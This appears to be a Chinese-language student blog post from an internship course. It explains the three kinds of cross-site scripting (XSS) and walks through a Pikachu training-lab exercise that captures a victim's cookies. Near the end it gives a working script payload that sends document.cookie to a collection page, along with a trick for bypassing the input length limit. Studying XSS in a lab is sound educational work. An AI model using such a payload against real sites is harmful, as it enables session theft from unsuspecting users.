粤嵌科技毕业实习Day14

粤嵌科技毕业实习Day14

XSS(跨站脚本攻击)

  • Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。

  • XSS 的本质是:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。

    而由于直接在用户的终端执行,恶意代码能够直接获取用户的信息,或者利用这些信息冒充用户向网站发起攻击者定义的请求

    在部分情况下,由于输入的限制,注入的恶意脚本比较短。但可以通过引入外部的脚本,并由浏览器执行,来完成比较复杂的攻击策略。

  • XSS图解

  • XSS分类

    • 根据攻击的来源,XSS 攻击可分为存储型、反射型和 DOM 型三种。

    • 存储区:恶意代码存放的位置

    • 插入点:由谁取得恶意代码,并插入到网页上。

      • 存储型 XSS

        • 这种攻击常见于带有用户保存数据的网站功能,如论坛发帖、商品评论、用户私信等。
        1. 攻击者将恶意代码提交到目标网站的数据库中。
        2. 用户打开目标网站时,网站服务端将恶意代码从数据库取出,拼接在 HTML 中返回给浏览器。
        3. 用户浏览器接收到响应后解析执行,混在其中的恶意代码也被执行。
        4. 在部分情况下,恶意代码加载外部的代码,用于执行更复杂的逻辑。
        5. 恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。

      • 反射型 XSS 的攻击步骤:

        1. 攻击者构造出特殊的 URL,其中包含恶意代码。
        2. 用户打开带有恶意代码的 URL 时,网站服务端将恶意代码从 URL 中取出,拼接在 HTML 中返回给浏览器。
        3. 用户浏览器接收到响应后解析执行,混在其中的恶意代码也被执行。
        4. 在部分情况下,恶意代码加载外部的代码,用于执行更复杂的逻辑
        5. 恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。
        6. 反射型 XSS 跟存储型 XSS 的区别是:存储型 XSS 的恶意代码存在数据库里,反射型 XSS 的恶意代码存在 URL 里。
        7. 反射型 XSS 漏洞常见于通过 URL 传递参数的功能,如网站搜索、跳转等。
        8. 由于需要用户主动打开恶意的 URL 才能生效,攻击者往往会结合多种手段诱导用户点击。
        9. POST 的内容也可以触发反射型 XSS,只不过其触发条件比较苛刻(需要构造表单提交页面,并引导用户点击),所以非常少见。

      • DOM 型 XSS 的攻击步骤:

        1. 攻击者构造出特殊的 URL,其中包含恶意代码。
        2. 用户打开带有恶意代码的 URL。
        3. 用户浏览器接收到响应后解析执行,前端 JavaScript 取出 URL 中的恶意代码并执行。
        4. 在部分情况下,恶意代码加载外部的代码,用于执行更复杂的逻辑。
        5. 恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。
        6. DOM 型 XSS 跟前两种 XSS 的区别:DOM 型 XSS 攻击中,取出和执行恶意代码由浏览器端完成,属于前端 JavaScript 自身的安全漏洞,而其他两种 XSS 都属于服务端的安全漏洞。

        Document Object Model(文档对象模型)HTML DOM 定义了访问和操作 HTML 文档的标准。

XSS练习

  1. 搭建xss后台

    1. 修改phpstudy\PHPTutorial\WWW\pikachu\inc\config.inc配置文件

      //定义数据库连接参数
define('DBHOST', 'localhost');//将localhost修改为数据库服务器的地址
define('DBUSER', 'root');//将root修改为连接mysql的用户名
define('DBPW', 'root');//将root修改为连接mysql的密码

  2. 登录到xss后台

    1. 找到管理工具-XSS后台

  1. 初始化安装

  1. 输入提示的用户密码

  1. 通过后台,可以查看搜集到的cookie。

  1. 修改phpStudy\PHPTutorial\WWW\pikachu\pkxss\xcookie\cookie.php的header里面的重定向地址
header("Location:http://127.0.0.1/pikachu/index.php");//重定向到一个可信的网站
  1. 获取反射型xss的cookie

  1. 输入测试

  1. 按F12查看源码,可以发现最大长度为20,导致无法输入更多的内容,直接修改到200

  1. 输入并提交下面代码搜集cookie
<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

  1. 前往xss后台,查看获取的cookie

referer地址一旦被访问就会跳回主页,同时获取到cookie值。

本文作者:AlubNoBug
本文链接:https://www.cnblogs.com/AlubNoBug/p/13695520.html

posted @ 2020-09-19 11:33  AlubNoBug  阅读(127)  评论(0编辑  收藏  举报